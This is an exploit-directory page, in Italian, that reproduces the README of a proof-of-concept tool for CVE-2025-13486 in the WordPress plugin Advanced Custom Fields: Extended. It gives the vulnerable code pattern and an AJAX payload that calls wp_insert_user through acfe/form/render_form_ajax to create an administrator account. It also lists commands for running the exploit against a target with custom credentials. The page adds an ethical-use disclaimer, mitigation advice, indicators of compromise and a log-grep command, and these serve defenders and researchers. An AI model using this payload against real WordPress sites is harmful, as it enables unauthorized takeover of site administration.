Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Creazione Amministratore | Kitploit
Strumenti/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Creazione Amministratore

Vedi Repository
118 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔴 CVE-2025-13486 - Exploit del plugin WordPress Advanced Custom Fields Extended (ACFE)

WordPress Python License Status

WordPress Logo

📋 Panoramica

Exploit proof-of-concept per CVE-2025-13486, una vulnerabilità critica nel plugin WordPress Advanced Custom Fields: Extended (ACFE) che consente l'esecuzione remota di codice portando all'escalation dei privilegi.

🎯 Dettagli della vulnerabilità

AspettoDettagli
CVE IDCVE-2025-13486
PluginAdvanced Custom Fields: Extended (ACFE)
TipoEsecuzione remota di codice → Escalation dei privilegi
Livello di rischioCritico
Versioni affetteVersioni vulnerabili di ACFE (versioni specifiche da determinare)
Punteggio CVSS9.8 CRITICO
Data di scoperta2025
Autore0xgh057r3c0n

⚠️ DICHIARAZIONE DI USO ETICO

⚠️ AVVERTENZA: Questo strumento è SOLO per test di sicurezza autorizzati e scopi educativi.

✅ Uso consentito:

  • Ricerca sulla sicurezza e istruzione
  • Test dei propri sistemi
  • Test di penetrazione autorizzati con permesso scritto
  • Ricerca accademica e insegnamento
  • Formazione sulla consapevolezza della sicurezza

❌ Uso vietato:

  • Test non autorizzati di sistemi che non possiedi
  • Attacchi malevoli o hacking
  • Qualsiasi attività illegale
  • Violazione delle leggi contro le frodi informatiche (CFAA, ecc.)
  • Test di sicurezza non etici

L'autore non è responsabile per qualsiasi uso improprio di questo strumento. Ottenere sempre la corretta autorizzazione scritta prima di testare qualsiasi sistema.

🔧 Caratteristiche

🔍 Modalità di verifica

  • Estrazione del nonce dalle pagine WordPress
  • Conferma della vulnerabilità utilizzando la funzione print_r
  • Verifica sicura senza sfruttamento
  • Corrispondenza di più pattern per il rilevamento del nonce

⚡ Modalità di sfruttamento

  • Creazione di un utente amministrativo tramite wp_insert_user
  • Credenziali personalizzate o generate casualmente
  • Supporto per nomi utente, password e email personalizzati
  • Analisi della risposta per indicatori di successo

🛠️ Caratteristiche tecniche

  • Rilevamento automatico del protocollo (HTTP/HTTPS)
  • Output del terminale con codifica a colori
  • Bypass della verifica SSL per ambienti di test
  • Segnalazione dettagliata degli errori e debugging
  • Gestione del timeout di sessione e della connessione

📦 Installazione

Requisiti

  • Python 3.6+
  • Libreria requests

Configurazione

root@kitploit:~
# Clone repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# Install dependencies
pip install requests

# Alternative: Install from requirements.txt
pip install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x exploit.py

Dipendenze

Create a requirements.txt file:

root@kitploit:~
requests>=2.25.1

🚀 Utilizzo

Sintassi di base

root@kitploit:~
python3 exploit.py --url <TARGET_URL> [OPTIONS]

Esempi

1. Verifica solo della vulnerabilità (Test sicuro)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. Sfruttamento con credenziali casuali

root@kitploit:~
python3 exploit.py --url https://target.com

3. Sfruttamento con credenziali personalizzate

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. Target senza protocollo (Rilevamento automatico)

root@kitploit:~
python3 exploit.py --url target.com --verify

Opzioni della riga di comando

🧪 Come funziona

1. Meccanismo della vulnerabilità

L'exploit sfrutta una gestione impropria delle funzioni nell'endpoint acfe/form/render_form_ajax del plugin ACFE, consentendo agli aggressori di chiamare funzioni PHP arbitrarie.

2. Flusso tecnico

root@kitploit:~
1. Validazione URL → Rilevamento automatico HTTP/HTTPS
2. Estrazione nonce → Scansiona la pagina per il nonce ACF
3. Costruzione payload → Costruisce richiesta AJAX malevola
4. Esecuzione richiesta → Invia exploit al target
5. Analisi risultato → Controlla indicatori di successo

3. Payload dell'exploit

root@kitploit:~
// Vulnerable code pattern in ACFE
$result = call_user_func_array($form['render'], array($form));

// Exploit payload structure
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ Mitigazione

Azioni immediate

  1. Aggiornare il plugin: Aggiornare immediatamente il plugin ACFE all'ultima versione
  2. Rimuovere il plugin: Se l'aggiornamento non è disponibile, disabilitare temporaneamente ACFE
  3. Web Application Firewall: Distribuire regole WAF per bloccare richieste malevole
  4. Monitoraggio: Monitorare la creazione sospetta di utenti admin

Rafforzamento della sicurezza WordPress

root@kitploit:~
# Recommended security plugins
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# Server-level protections
- Implement rate limiting
- Enable mod_security rules
- Use Cloudflare or similar CDN
- Regular security audits

🔍 Rilevamento

Indicatori di compromissione (IoC)

  • Creazione di utente admin non autorizzata
  • Richieste AJAX sospette a /wp-admin/admin-ajax.php
  • Richieste con action=acfe/form/render_form_ajax
  • Chiamate di funzione wp_insert_user inaspettate tramite AJAX

Monitoraggio dei log

root@kitploit:~
# Apache logs
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPress debug logs
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 Riferimenti

  1. Repository plugin WordPress: Advanced Custom Fields: Extended
  2. Database CVE: CVE-2025-13486
  3. Team di sicurezza WordPress: Plugin Security Guidelines
  4. OWASP Top 10: Attacchi di injection

🤝 Contributi

  1. Fork del repository
  2. Creare un ramo feature (git checkout -b feature/improvement)
  3. Committare le modifiche (git commit -am 'Add new feature')
  4. Pushare sul ramo (git push origin feature/improvement)
  5. Creare una Pull Request

Linee guida per i contributori

  • Seguire la guida di stile Python PEP 8
  • Aggiungere commenti per logiche complesse
  • Includere gestione degli errori
  • Aggiornare la documentazione

🐛 Segnalazione problemi

Segnalare bug e problemi tramite:

  1. GitHub Issues: Crea un nuovo Issue
  2. Vulnerabilità di sicurezza: Divulgazione responsabile all'autore prima

📊 Struttura del progetto

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # Main exploit script
├── README.md           # This documentation
├── requirements.txt    # Python dependencies
├── LICENSE            # MIT License file
├── examples/          # Usage examples
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # Test scripts
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 Autore

0xgh057r3c0n - Ricercatore di sicurezza

  • GitHub: @0xgh057r3c0n
  • Twitter: @0xgh057r3c0n

📜 Licenza

Questo progetto è distribuito con licenza MIT - vedere il file LICENSE per i dettagli.

Realizzato con ❤️ per la comunità della sicurezza
⚠️ Usare in modo responsabile ed etico ⚠️

Scarica lo strumento
OpzioneDescrizioneObbligatorioPredefinito
-u, --urlURL WordPress targetSì-
--verifySolo verifica, nessuno sfruttamentoNoFalse
--userNome utente personalizzato per adminNoadmin_XXXXX
--passwordPassword personalizzata per adminNo12 caratteri casuali
--emailEmail personalizzata per adminNo[email protected]